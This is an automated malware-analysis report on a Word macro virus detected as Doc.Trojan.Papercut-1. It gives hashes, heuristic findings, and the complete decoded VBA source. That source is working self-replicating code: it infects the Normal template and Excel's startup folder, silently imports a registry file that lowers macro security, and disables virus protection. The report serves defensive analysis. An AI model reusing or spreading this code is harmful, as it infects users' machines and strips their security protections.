Office (OLE) malware analysis — malicious · 68bb4fe6f0ba2e89

MALICIOUS

Office (OLE)

37.0 KB Created: 2001-03-28 07:46:00 Authoring application: Microsoft Word 10.0 First seen: 2015-09-30

MD5: a6efc20401835168dcbf7a05ea624ea0 SHA-1: 4ddb8364db0a4ce68e5a62dc4cb777ac3fbf3850 SHA-256: 68bb4fe6f0ba2e897a625c9e32b259a9b374bf32a07fd7715fe32d625187b7ee

448 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1140 Deobfuscate or Decode Files or Information T1071.001 Web Protocols

The sample contains heavily obfuscated VBA macros with a Document_Open auto-execution loader. Heuristics indicate the macros attempt to self-replicate, tamper with AV settings via registry modifications, and use CreateObject/GetObject calls, suggesting an intent to download and execute a second-stage payload. The VBA code attempts to write to the registry keys HKEY_CURRENT_USER\Software\Microsoft\VBA\Office\CodeForeColors and HKEY_CURRENT_USER\Software\Microsoft\VBA\Office\CodeBackColors.

Heuristics 9

ClamAV: Doc.Trojan.Papercut-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Papercut-1
VBA macros detected medium 7 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell "regedit /s c:\base.reg", vbHide
```
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
Set WordObj = GetObject(, "Word.Application")
```
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
dis.deletelines 1, dis.countoflines
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set WordObj = CreateObject("Word.Application")
```
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set WordObj = GetObject(, "Word.Application")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8197 bytes
SHA-256: `9552a6c4bfaaa90b112270fd28430637b4de9b708428197aae8b52779ce95119`
Detection ClamAV: Doc.Trojan.Papercut-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() ' On Error Resume Next Set a = Application: e = a.Version: wo = Chr(84) + Chr(104) + Chr(105) + Chr(115) + Chr(87) + Chr(111) + Chr(114) + Chr(107) + Chr(98) + Chr(111) + Chr(111) + Chr(107) If a = Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(32) + Chr(69) + Chr(120) + Chr(99) + Chr(101) + Chr(108) Then p = 0 Set act = ActiveWorkbook.VBProject.VBComponents(wo).CodeModule Set dis = ThisWorkbook.VBProject.VBComponents(wo).CodeModule End If If a <> Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(32) + Chr(69) + Chr(120) + Chr(99) + Chr(101) + Chr(108) Then p = 1 Set act = ActiveDocument.VBProject.VBComponents.Item(p).CodeModule Set dis = NormalTemplate.VBProject.VBComponents.Item(p).CodeModule If dis.Lines(2, 1) <> "'" Then dis.deletelines 1, dis.countoflines dis.insertlines 1, act.Lines(1, act.countoflines) dis.Save System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeForeColors") = "1 1 1 0 1 1 1 1 0 0 0 0 0 0 0 0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeBackColors") = "1 1 0 1 1 0 0 0 0 0 0 0 0 0 0 0" End If End If If act.Lines(2, 1) <> "'" Then act.deletelines 1, act.countoflines act.insertlines 1, dis.Lines(1, dis.countoflines) If a = Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(32) + Chr(69) + Chr(120) + Chr(99) + Chr(101) + Chr(108) Then ActiveWorkbook.Save Else ActiveDocument.SaveAs ActiveDocument.FullName End If End If If a = Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(32) + Chr(69) + Chr(120) + Chr(99) + Chr(101) + Chr(108) Then Drop = "true" Set WordObj = GetObject(, "Word.Application") If WordObj = "" Then Set WordObj = CreateObject("Word.Application") crossQuit = True Set ohio = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule If ohio.Lines(2, 1) <> "'" Then WordObj.Options.SaveNormalPrompt = False ohio.deletelines 1, ohio.countoflines ohio.insertlines 1, dis.Lines(1, dis.countoflines) ohio.Replaceline 1, "Private Sub Document_Open" ohio.Save End If If crossQuit = True Then WordObj.Quit End If End If If a <> Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(32) + Chr(69) + Chr(120) + Chr(99) + Chr(101) + Chr(108) Then ra = Dir("c:\papercut.reg") If ra = "" Then Drop = "true" If Drop <> "true" Then GoTo hd300 Set xlapp = CreateObject("Excel.Application") Set book1Obj = xlapp.Workbooks.Add chk = Dir(xlapp.Application.StartupPath & "\Book1.xls") If chk = "" Then book1Obj.VBProject.VBComponents.Item(wo).CodeModule.insertlines 1, dis.Lines(1, dis.countoflines) book1Obj.VBProject.VBComponents.Item(wo).CodeModule.Replaceline 1, "Private Sub Workbook_Deactivate()" book1Obj.SaveAs xlapp.Application.StartupPath & "\Book1.xls" book1Obj.Close Drop = "true" End If xlapp.Quit End If hd300: If Drop = "true" Then Open "c:\base.reg" For Output As 1 Print #1, Chr(82) + Chr(69) + Chr(71) + Chr(69) + Chr(68) + Chr(73) + Chr(84) + Chr(52) Print #1, Chr(91) + Chr(72) + Chr(75) + Chr(69) + Chr(89) + Chr(95) + Chr(67) + Chr(85) + Chr(82) + Chr(82) + Chr(69) + Chr(78) + Chr(84) + Chr(95) + Chr(85) + Chr(83) + Chr(69) + Chr(82) + Chr(92) + Chr(83) + Chr(111) + Chr(102) + Chr(116) + Chr(119) + Chr(97) + Chr(114) + Chr(101) + Chr(92) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(92) + Chr(79) + Chr(102) + Chr(102) + Chr(105) + Chr(99) + Chr(101) + Chr(92) + Chr(56) + Chr(46) + Chr(48) + Chr(92) + Chr(69) + Chr(120) + Chr(99) + Chr(101) + Chr(108) + Chr(92) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(32) + Chr(69) + Chr(120) + Chr(99) + Chr(101) + Chr(108) + Chr(93) Print #1, """Options6""=dword:00000000" Print #1, Chr(91) + Chr(72) + Chr(75) + Chr(69) + Chr(89) + Chr(95) + Chr(67) + Chr(85) + Chr(82) + Chr(82) + Chr(69) + Chr(78) + Chr(84) + Chr(95) + Chr(85) + Chr(83) + Chr(69) + Chr(82) + Chr(92) + Chr(83) + Chr(111) + Chr(102) + Chr(116) + Chr(119) + Chr(97) + Chr(114) + Chr(101) + Chr(92) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(92) + Chr(79) + Chr(102) + Chr(102) + Chr(105) + Chr(99) + Chr(101) + Chr(92) + Chr(57) + Chr(46) + Chr(48) + Chr(92) + Chr(69) + Chr(120) + Chr(99) + Chr(101) + Chr(108) + Chr(92) + Chr(83) + Chr(101) + Chr(99) + Chr(117) + Chr(114) + Chr(105) + Chr(116) + Chr(121) + Chr(93) Print #1, """Level""=dword:00000001" Print #1, Chr(91) + Chr(72) + Chr(75) + Chr(69) + Chr(89) + Chr(95) + Chr(67) + Chr(85) + Chr(82) + Chr(82) + Chr(69) + Chr(78) + Chr(84) + Chr(95) + Chr(85) + Chr(83) + Chr(69) + Chr(82) + Chr(92) + Chr(83) + Chr(111) + Chr(102) + Chr(116) + Chr(119) + Chr(97) + Chr(114) + Chr(101) + Chr(92) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(92) + Chr(79) + Chr(102) + Chr(102) + Chr(105) + Chr(99) + Chr(101) + Chr(92) + Chr(49) + Chr(48) + Chr(46) + Chr(48) + Chr(92) + Chr(69) + Chr(120) + Chr(99) + Chr(101) + Chr(108) + Chr(92) + Chr(83) + Chr(101) + Chr(99) + Chr(117) + Chr(114) + Chr(105) + Chr(116) + Chr(121) + Chr(93) Print #1, """Level""=dword:00000001" Print #1, Chr(91) + Chr(72) + Chr(75) + Chr(69) + Chr(89) + Chr(95) + Chr(76) + Chr(79) + Chr(67) + Chr(65) + Chr(76) + Chr(95) + Chr(77) + Chr(65) + Chr(67) + Chr(72) + Chr(73) + Chr(78) + Chr(69) + Chr(92) + Chr(83) + Chr(111) + Chr(102) + Chr(116) + Chr(119) + Chr(97) + Chr(114) + Chr(101) + Chr(92) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(92) + Chr(79) + Chr(102) + Chr(102) + Chr(105) + Chr(99) + Chr(101) + Chr(92) + Chr(49) + Chr(48) + Chr(46) + Chr(48) + Chr(92) + Chr(69) + Chr(120) + Chr(99) + Chr(101) + Chr(108) + Chr(92) + Chr(83) + Chr(101) + Chr(99) + Chr(117) + Chr(114) + Chr(105) + Chr(116) + Chr(121) + Chr(93) Print #1, """AccessVBOM""=dword:00000001" Print #1, Chr(91) + Chr(72) + Chr(75) + Chr(69) + Chr(89) + Chr(95) + Chr(67) + Chr(85) + Chr(82) + Chr(82) + Chr(69) + Chr(78) + Chr(84) + Chr(95) + Chr(85) + Chr(83) + Chr(69) + Chr(82) + Chr(92) + Chr(83) + Chr(111) + Chr(102) + Chr(116) + Chr(119) + Chr(97) + Chr(114) + Chr(101) + Chr(92) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(92) + Chr(79) + Chr(102) + Chr(102) + Chr(105) + Chr(99) + Chr(101) + Chr(92) + Chr(49) + Chr(48) + Chr(46) + Chr(48) + Chr(92) + Chr(87) + Chr(111) + Chr(114) + Chr(100) + Chr(92) + Chr(83) + Chr(101) + Chr(99) + Chr(117) + Chr(114) + Chr(105) + Chr(116) + Chr(121) + Chr(93) Print #1, """Level""=dword:00000001" Print #1, Chr(91) + Chr(72) + Chr(75) + Chr(69) + Chr(89) + Chr(95) + Chr(76) + Chr(79) + Chr(67) + Chr(65) + Chr(76) + Chr(95) + Chr(77) + Chr(65) + Chr(67) + Chr(72) + Chr(73) + Chr(78) + Chr(69) + Chr(92) + Chr(83) + Chr(111) + Chr(102) + Chr(116) + Chr(119) + Chr(97) + Chr(114) + Chr(101) + Chr(92) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(92) + Chr(79) + Chr(102) + Chr(102) + Chr(105) + Chr(99) + Chr(101) + Chr(92) + Chr(49) + Chr(48) + Chr(46) + Chr(48) + Chr(92) + Chr(87) + Chr(111) + Chr(114) + Chr(100) + Chr(92) + Chr(83) + Chr(101) + Chr(99) + Chr(117) + Chr(114) + Chr(105) + Chr(116) + Chr(121) + Chr(93) Print #1, """AccessVBOM""=dword:00000001" Close 1 Shell "regedit /s c:\base.reg", vbHide End If 'XP/Base 'all your officeXP 'are belong to us '[aSt] If p = 1 And e <> "10.0" Then CommandBars("Tools").Controls("Macro").Enabled = False Options.VirusProtection = (Rnd * 0) End If End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.